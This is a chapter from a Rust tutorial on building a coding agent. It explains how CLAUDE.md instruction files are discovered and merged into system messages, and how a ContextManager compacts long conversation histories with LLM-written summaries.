              │
              ▼
  ┌─────────────────────────────┐
  │  messages[0] = System(      │      (injected once, never edited)
  │    "# Instructions from ... │
  │     <concatenated CLAUDE>"  │
  │  )                          │
  └─────────────────────────────┘
              │
              ▼  (agent loop: User → Assistant → ToolResult → ...)
              │
  ┌─────────────────────────────┐
  │  ContextManager             │      (runs after every turn)
  │                             │
  │  .record(usage)             │  ← accumulate input + output tokens
  │  .should_compact()          │  ← tokens_used >= max_tokens?
  │                             │
  │  On trigger:                │
  │    keep  messages[0]        │  ← the system/instructions message
  │    ask   provider to        │
  │          summarise middle   │  ← LLM call with the old transcript
  │    keep  last N messages    │
  │                             │
  │  Result: short history,     │
  │  same system prompt.        │
  └─────────────────────────────┘

Two points to notice.

Instructions are stable within a session. They are loaded once, become the first system message, and are never rewritten. Launch from a different directory and you get a different messages[0], but once a session has started the instruction content is fixed. Users generally do not edit CLAUDE.md mid-chat.

Context management is session-level, not prompt-level. Compaction does not splice new sections into a "system prompt"; it rewrites the message history by summarising the middle. The system prompt (which carries your instructions) is deliberately excluded from compaction -- it is always the anchor.


Revisiting InstructionLoader

You built this in Chapter 8. Let's revisit the code now that we are using it in a real pipeline, because the design decisions matter more in context.

The struct

#![allow(unused)]
fn main() {
pub struct InstructionLoader {
    file_names: Vec<String>,
}
}

The loader does not hardcode which files to look for. It takes a list of file names, and default_files() sets that list to ["CLAUDE.md", ".claw/instructions.md"]. This means you can swap in different file names for testing, or add project-specific alternatives without modifying the loader.

#![allow(unused)]
fn main() {
impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
        Self {
            file_names: file_names.iter().map(|s| s.to_string()).collect(),
        }
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".claw/instructions.md"])
    }
}
}

Discovery: the upward walk

flowchart BT
    A["/home/user/project/backend/"] -->|check for CLAUDE.md| B["/home/user/project/"]
    B -->|check for CLAUDE.md| C["/home/user/"]
    C -->|check for CLAUDE.md| D["/home/"]
    D -->|check for CLAUDE.md| E["/"]

    A -.->|"found: backend/CLAUDE.md"| F["Collected paths<br/>(reversed to root-first)"]
    B -.->|"found: project/CLAUDE.md"| F
    C -.->|"found: user/CLAUDE.md"| F

discover() starts at the given directory and walks toward the filesystem root. At each directory, it checks for every file name in the list:

#![allow(unused)]
fn main() {
pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());

    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }

    found.reverse(); // Root-first order
    found
}
}

The found.reverse() at the end is the key design choice. The walk naturally collects files from most-specific to most-general (start directory first, root last). Reversing puts them in root-first order.

After discover("/home/user/project/backend") with CLAUDE.md files at three levels, the vector is:

[0] /home/user/CLAUDE.md                  ← global preferences
[1] /home/user/project/CLAUDE.md          ← project conventions
[2] /home/user/project/backend/CLAUDE.md  ← subdirectory rules

Global preferences come first. The most specific rules come last. When the LLM reads the system prompt, the last instructions have the strongest influence -- the same principle as CSS specificity: general rules first, overrides last.

Loading: read, filter, join

load() calls discover(), reads each file, and concatenates the results:

#![allow(unused)]
fn main() {
pub fn load(&self, start_dir: &Path) -> Option<String> {
    let paths = self.discover(start_dir);
    if paths.is_empty() {
        return None;
    }

    let mut sections = Vec::new();
    for path in &paths {
        if let Ok(content) = std::fs::read_to_string(path) {
            let content = content.trim().to_string();
            if !content.is_empty() {
                sections.push(format!(
                    "# Instructions from {}\n\n{}",
                    path.display(),
                    content
                ));
            }
        }
    }

    if sections.is_empty() {
        None
    } else {
        Some(sections.join("\n\n---\n\n"))
    }
}
}

Four details:

Headers. Each file's content is prefixed with # Instructions from <path>. This tells the LLM where each block came from, helping it resolve contradictions between levels.

Separators. Files are joined with \n\n---\n\n -- a horizontal rule in markdown that gives the LLM a clear boundary between instruction blocks.

Empty file skipping. If a CLAUDE.md exists but is empty or whitespace-only, it is silently skipped. No point wasting context tokens on an empty section.

Returning None. If no instruction files are found, or all are empty, load() returns None rather than Some(""). This lets the caller skip adding an instructions section entirely.
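The read-filter-join step can be exercised in isolation. This standalone sketch mirrors load()'s filtering and joining, with file contents passed in directly instead of read from disk; the join_sections helper is illustrative, not part of the starter:

```rust
/// Mirror of load()'s filter-and-join step: skip blank content,
/// prefix each section with its source path, join with a horizontal rule.
fn join_sections(files: &[(&str, &str)]) -> Option<String> {
    let sections: Vec<String> = files
        .iter()
        .filter(|(_, content)| !content.trim().is_empty())
        .map(|(path, content)| {
            format!("# Instructions from {}\n\n{}", path, content.trim())
        })
        .collect();
    if sections.is_empty() {
        None
    } else {
        Some(sections.join("\n\n---\n\n"))
    }
}

fn main() {
    // The whitespace-only file is skipped; the other two are joined.
    let joined = join_sections(&[
        ("/home/user/CLAUDE.md", "Prefer cargo test."),
        ("/home/user/project/CLAUDE.md", "   "),
        ("/home/user/project/backend/CLAUDE.md", "Never edit generated files."),
    ])
    .unwrap();
    assert!(joined.contains("# Instructions from /home/user/CLAUDE.md"));
    assert!(joined.contains("\n\n---\n\n"));
    // All-empty input collapses to None, not Some("").
    assert_eq!(join_sections(&[("CLAUDE.md", "\n  \n")]), None);
}
```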


The instruction hierarchy

Instructions can come from multiple sources. Here is the full hierarchy, from broadest to most specific:

Source                                   Priority    Section type
─────────────────────────────────────────────────────────────────
/home/user/CLAUDE.md                     lowest      file (root-first)
/home/user/project/CLAUDE.md             ↓           file
/home/user/project/backend/CLAUDE.md     ↓           file
.claw/instructions.md                    ↓           file (alternative)
Config.instructions                      highest     config

File-based instructions are discovered by the InstructionLoader and appear in root-first order. Config-based instructions come from the Config struct's instructions field -- loaded from .claw/config.toml or ~/.config/mini-claw/config.toml.

Both become dynamic sections in the system prompt. File instructions are added first, config instructions second. Since the LLM reads the prompt top-to-bottom, config instructions have the final word when there is a conflict.

Why two sources?

CLAUDE.md files are committed to version control. They represent team conventions that everyone on the project shares. "Run tests with cargo test." "Never modify generated files." "Use edition 2024."

Config instructions are local. They live in .claw/config.toml (which may or may not be committed) or in the user's home config directory (which is never committed). They represent personal preferences or temporary overrides. "Always explain your reasoning." "Focus on performance over readability for this session."


Key Rust concept: Option chaining with if let for optional pipeline steps

The wiring code uses if let Some(instructions) = loader.load(...) to conditionally add sections. This pattern is idiomatic Rust for optional pipeline steps: InstructionLoader::load() returns Option<String> -- None when no instruction files exist, Some(text) when they do. The if let binding destructures the Option and only executes the body when there is a value. Similarly, Config.instructions is Option<String>, and if let Some(ref inst) = config.instructions only adds the section when the config has instructions. This means the prompt builder never adds empty sections -- the system prompt is exactly as long as it needs to be.
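A minimal illustration of the pattern, using plain Strings in place of the real section types (build_sections is a hypothetical name, not from the starter):

```rust
/// Append optional instruction blocks; absent sources add nothing.
fn build_sections(
    file_instructions: Option<String>,
    config_instructions: Option<String>,
) -> Vec<String> {
    let mut sections = Vec::new();
    if let Some(inst) = file_instructions {
        sections.push(inst); // file-based block first
    }
    if let Some(inst) = config_instructions {
        sections.push(inst); // config block last: it gets the final word
    }
    sections
}

fn main() {
    // No sources: the prompt gets no instruction sections at all.
    assert_eq!(build_sections(None, None).len(), 0);
    // Both sources: file block first, config block last.
    let s = build_sections(Some("from CLAUDE.md".into()), Some("from config".into()));
    assert_eq!(s, vec!["from CLAUDE.md".to_string(), "from config".to_string()]);
}
```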


Wiring it together

Session startup is where InstructionLoader meets Config.instructions. Both end up as system messages at the head of the conversation. In code:

#![allow(unused)]
fn main() {
let loader = InstructionLoader::default_files();
let mut messages: Vec<Message> = Vec::new();

// File-based instructions (CLAUDE.md, root-first).
if let Some(instructions) = loader.load(Path::new(cwd)) {
    messages.push(Message::System(instructions));
}

// Config-based instructions get the last word.
if let Some(ref inst) = config.instructions {
    messages.push(Message::System(inst.clone()));
}
}

Message::System is the variant we have been using throughout the book for the agent's instructions. Both sources become system messages at the head of the history, in priority order: global → project → subdirectory → config. The LLM reads them top-down, so later messages override earlier ones when they disagree.

For this book we do not maintain a separate structured "prompt builder" that tracks identity / safety / environment / instructions as named sections. A production agent like Claude Code does: see the sidebar below for the shape of that design. What matters for the rest of this chapter is that the instructions are now sitting at the start of messages, and that the agent loop never touches them again.

Claude Code and similar agents separate the system prompt into named sections -- identity, safety, tool schemas, environment, instructions -- and split the list across a cache boundary. Everything above the boundary is stable across turns and can be marked cacheable by the provider; everything below can change and is re-sent each turn.

Schematically (this is not in the starter):

# identity, safety, tool schemas       ← cached prefix, stable across turns
# ──── cache boundary ─────────
# environment, instructions            ← dynamic suffix, may change

This design wins real cost and latency: long stable prefixes are processed once and reused. The starter does not model it explicitly because our Message::System messages already live in a single list; provider-side caching (when implemented) can key off the prefix of that list.
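If you wanted to model that boundary yourself, one sketch (again, not in the starter; the Section type and function name are hypothetical) marks each section as stable or not and splits at the first dynamic one:

```rust
/// Hypothetical prompt section: content plus a "stable across turns" flag.
struct Section {
    text: String,
    stable: bool,
}

/// Split at the cache boundary: the cacheable prefix is the longest
/// leading run of stable sections; everything after is re-sent each turn.
fn split_at_cache_boundary(sections: &[Section]) -> (&[Section], &[Section]) {
    let boundary = sections
        .iter()
        .position(|s| !s.stable)
        .unwrap_or(sections.len());
    sections.split_at(boundary)
}

fn main() {
    let sections = vec![
        Section { text: "identity".into(), stable: true },
        Section { text: "tool schemas".into(), stable: true },
        Section { text: "environment".into(), stable: false },
        Section { text: "instructions".into(), stable: false },
    ];
    let (prefix, suffix) = split_at_cache_boundary(&sections);
    assert_eq!(prefix.len(), 2); // processed once, reused across turns
    assert_eq!(suffix.len(), 2); // re-sent each turn
    assert_eq!(suffix[0].text, "environment");
}
```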

For the rest of the chapter we focus on what the starter does model: keeping the conversation short enough to fit in the context window as the session runs long. That job belongs to ContextManager.


ContextManager: the compaction algorithm

The starter's ContextManager lives in src/context.rs. It has three responsibilities:

  1. Track token usage (record): add the input + output tokens from each provider turn to a running counter.
  2. Decide when to act (should_compact): return true once the counter hits the configured budget.
  3. Rewrite history when asked (compact): collapse old messages into a single LLM-generated summary while preserving the anchors.

The struct

#![allow(unused)]
fn main() {
pub struct ContextManager {
    max_tokens: u64,
    preserve_recent: usize,
    tokens_used: u64,
}
}

Two knobs, one piece of state.

  • max_tokens — the soft limit. When tokens_used reaches it, compaction triggers. Set this comfortably below the model's hard context limit so there is room for the next turn to complete before you shrink.
  • preserve_recent — how many trailing messages survive compaction untouched. These carry the immediate conversational context -- the last user turn, the tool call you just made, the tool result you are about to reason about. Summarising them would break the next turn.
  • tokens_used — the running total, updated by record after every provider call.

Recording and triggering

record is tiny -- it just accumulates:

#![allow(unused)]
fn main() {
pub fn record(&mut self, usage: &TokenUsage) {
    self.tokens_used += usage.input_tokens + usage.output_tokens;
}
}

And should_compact compares against the budget:

#![allow(unused)]
fn main() {
pub fn should_compact(&self) -> bool {
    self.tokens_used >= self.max_tokens
}
}

The agent loop calls record after each provider turn and then maybe_compact, which only invokes compact when the threshold is reached. In practice this means compaction is rare: most turns are under budget and do nothing.
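A simplified, synchronous sketch of that gate -- the real compact() is async and calls the provider, so here the rough token reset stands in for the full history rewrite:

```rust
struct ContextManager {
    max_tokens: u64,
    tokens_used: u64,
}

impl ContextManager {
    fn record(&mut self, input_tokens: u64, output_tokens: u64) {
        self.tokens_used += input_tokens + output_tokens;
    }

    fn should_compact(&self) -> bool {
        self.tokens_used >= self.max_tokens
    }

    /// Gate: only rewrite history once the budget is hit.
    fn maybe_compact(&mut self) -> bool {
        if !self.should_compact() {
            return false; // the common case: most turns do nothing
        }
        // The real compact() rewrites the message history here
        // (head + summary + recent); we only model the token reset.
        self.tokens_used /= 3;
        true
    }
}

fn main() {
    let mut mgr = ContextManager { max_tokens: 100, tokens_used: 0 };
    mgr.record(30, 10); // 40 tokens: under budget
    assert!(!mgr.maybe_compact());
    mgr.record(50, 20); // 110 tokens: over budget
    assert!(mgr.maybe_compact());
    assert_eq!(mgr.tokens_used, 36); // 110 / 3, integer division
}
```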

Compaction: head + summary + tail

compact splits the message history into three slices:

messages = [ head        | middle        | recent          ]
           <-- keep ---->|<-- summarise->|<-- keep intact ->

  • head — the leading Message::System (if present). This is where the CLAUDE.md-derived instructions live. Always preserved.
  • middle — everything between head and the last preserve_recent messages. This is what gets summarised.
  • recent — the last preserve_recent messages. Always preserved.

The middle is rendered as a compact transcript ("User: ...", "Assistant: ...", " [tool: name]", " Tool result: <preview>"), sent to the provider with a short instruction ("Summarise in 2-3 sentences, preserving key facts and decisions"), and the result becomes a single synthetic system message: Message::System("[Conversation summary]: ...").

The reconstructed vector is [head, summary, ...recent]. A 40-message conversation collapses to roughly 1 + 1 + preserve_recent messages.
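The three-way split can be sketched like this, with String standing in for Message and a caller-supplied closure standing in for the LLM summarisation call (the names are illustrative, not the starter's exact signatures):

```rust
/// Head + summary + recent: preserve the leading system message and the
/// trailing `preserve_recent` messages; collapse everything in between.
fn compact(
    messages: Vec<String>,
    preserve_recent: usize,
    summarise: impl Fn(&[String]) -> String,
) -> Vec<String> {
    // head: the leading system message, if present
    let head_len =
        usize::from(messages.first().is_some_and(|m| m.starts_with("[system]")));
    // recent: the last preserve_recent messages (never overlapping the head)
    let recent_start = messages.len().saturating_sub(preserve_recent).max(head_len);
    let middle = &messages[head_len..recent_start];

    let mut out = Vec::with_capacity(head_len + 1 + preserve_recent);
    out.extend_from_slice(&messages[..head_len]);
    if !middle.is_empty() {
        out.push(format!("[system] [Conversation summary]: {}", summarise(middle)));
    }
    out.extend_from_slice(&messages[recent_start..]);
    out
}

fn main() {
    let mut messages = vec!["[system] instructions".to_string()];
    for i in 0..9 {
        messages.push(format!("turn {i}"));
    }
    // 10 messages in, preserve the last 3: head + summary + 3 recent = 5 out.
    let out = compact(messages, 3, |_| "canned summary".to_string());
    assert_eq!(out.len(), 5);
    assert_eq!(out[0], "[system] instructions");
    assert!(out[1].starts_with("[system] [Conversation summary]:"));
    assert_eq!(out[4], "turn 8");
}
```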

The /= 3 token reset

After compaction we cannot know exactly how many tokens the new history uses without re-tokenising. But we know the new history is much shorter than the old one, so continuing to accumulate against the pre-compaction total would trigger another compaction immediately. A rough proxy:

#![allow(unused)]
fn main() {
self.tokens_used /= 3;
}

Empirically, compacting a long history down to [system, summary, N recent] reduces token count by roughly 3–5×. Dividing by 3 is a conservative estimate that keeps the agent running until the real token count climbs back to the budget. A more precise implementation would re-count tokens from the new messages vector; the proxy is good enough for the starter and keeps the code simple.

Why summarise instead of truncate?

The obvious alternative is to drop old messages outright. That is cheap (no extra LLM call) but loses information. If the user said "use snake_case throughout" on turn 3 and you drop it on turn 40, the agent forgets. A summary preserves the decisions and facts from the dropped range at the cost of one extra LLM roundtrip per compaction. Since compactions are rare, the tradeoff favours the summary.

Why a system message for the summary rather than a user or assistant one? Because the summary is meta-context, not something either speaker said. System framing tells the LLM "this is background, not an active speaking turn", which matches how it is meant to be used.


How Claude Code does it

Claude Code discovers CLAUDE.md files by walking up from the working directory, following the same upward-walk pattern we implemented. But its instruction system is more elaborate in several ways.

User-level instructions. Claude Code supports ~/.claude/CLAUDE.md as a global instruction file. Our InstructionLoader achieves the same effect naturally: if the upward walk reaches the home directory and finds a CLAUDE.md, it gets included. No special case needed.

Settings-based tool rules. Claude Code's .claude/settings.json specifies per-tool permission rules. These configure the permission engine (Chapter 13), not the prompt. Our Config keeps it simpler with allowed_directory, protected_patterns, and blocked_commands.

Memory files. Claude Code supports persistent memory that accumulates facts across sessions. Memory is loaded alongside instructions but managed separately. Our book stops before memory, but the instruction loader is the natural hook point for extending into it.

Instruction validation. Claude Code warns when instructions at different levels contradict each other. Our implementation trusts the LLM to resolve contradictions using the root-first ordering -- the more specific instruction wins because it appears later.

The core pattern is identical: discover files, load them in order, inject as dynamic prompt sections. Everything else is refinement.


Tests

Run the tests:

cargo test -p mini-claw-code-starter instructions  # InstructionLoader
cargo test -p mini-claw-code-starter context_manager  # ContextManager

Note: InstructionLoader tests live in instructions (built in Chapter 8 and revisited here). ContextManager tests live in context_manager (added in this chapter).

Key InstructionLoader tests (instructions):

  • test_instructions_discover_in_current_dir -- Finds a CLAUDE.md in the start directory.
  • test_instructions_discover_in_parent -- Walks upward and finds a CLAUDE.md in the parent directory.
  • test_instructions_no_files_found -- Returns an empty list when no instruction files exist anywhere in the path.
  • test_instructions_load_content -- load() returns Some with the file content included.
  • test_instructions_load_empty_file -- load() returns None for an empty CLAUDE.md (no wasted tokens).
  • test_instructions_multiple_file_names -- Discovers both CLAUDE.md and .mini-claw/instructions.md in the same directory.
  • test_instructions_system_prompt_section -- system_prompt_section() wraps content with a "project instructions" header.
  • test_instructions_default_files -- default_files() constructor does not panic.

Key context tests (context_manager):

  • test_context_manager_below_threshold_no_compact -- Context manager does not trigger compaction when below the token threshold.
  • test_context_manager_triggers_at_threshold -- Compaction triggers when recorded tokens exceed the threshold.
  • test_context_manager_compact_preserves_system_prompt -- After compaction, the system prompt remains as the first message.
  • test_context_manager_compact_preserves_recent -- The most recent N messages survive compaction intact.

Key takeaway

Instructions are injected once at session start and compaction runs on demand mid-session. The system message at messages[0] is the anchor: it carries the instructions that differentiate this project from any other, and it survives every compaction unchanged so the agent never loses its grounding.


Recap

This chapter connected three pieces:

  • InstructionLoader discovers CLAUDE.md files by walking up the filesystem and concatenates them root-first with headers and separators. Global preferences come first, subdirectory overrides come last.

  • Config.instructions supplies an optional second block of instructions from the layered config built in Chapter 17. It gets appended after the file-based block, so it has the final word.

  • ContextManager tracks token usage and compacts the middle of the message history into an LLM-generated summary when the budget is exceeded. It preserves the leading system message (your instructions) and the trailing preserve_recent messages (your current conversational context).

The startup pipeline is: discover instruction files, build a Message::System with their concatenated content, optionally append another Message::System from Config.instructions, then run the normal agent loop. After every provider turn the loop calls record and maybe_compact; in a short session compaction never fires, in a long one it fires as many times as needed.


Where to go from here

This is the last chapter in the current series. The foundations are now in place: messages, provider, tools, agent loop, prompt, permissions, safety, hooks, plan mode, settings, and instructions.

Natural extensions to explore on your own:

  • Persistent memory -- facts the agent learns in one session and recalls in the next. Memory files load alongside instructions, but they are managed differently: instructions are authored by humans, memory is authored by the agent itself.
  • Token and cost tracking -- instrumenting the provider to aggregate per-session token usage and surface it in the TUI.
  • Smarter compaction -- our ContextManager uses a single summary pass and a rough /= 3 token reset. Production-grade alternatives include hierarchical summaries (summary of summaries) and re-tokenising the new history for an exact count.
  • Sessions and resume -- serializing the message history to disk so a conversation can be paused and resumed.
  • MCP (Model Context Protocol) -- loading tools from external MCP servers at runtime instead of hardcoding them at startup.
  • Subagents -- spawning child agents with a filtered tool set for scoped subtasks.

Check yourself

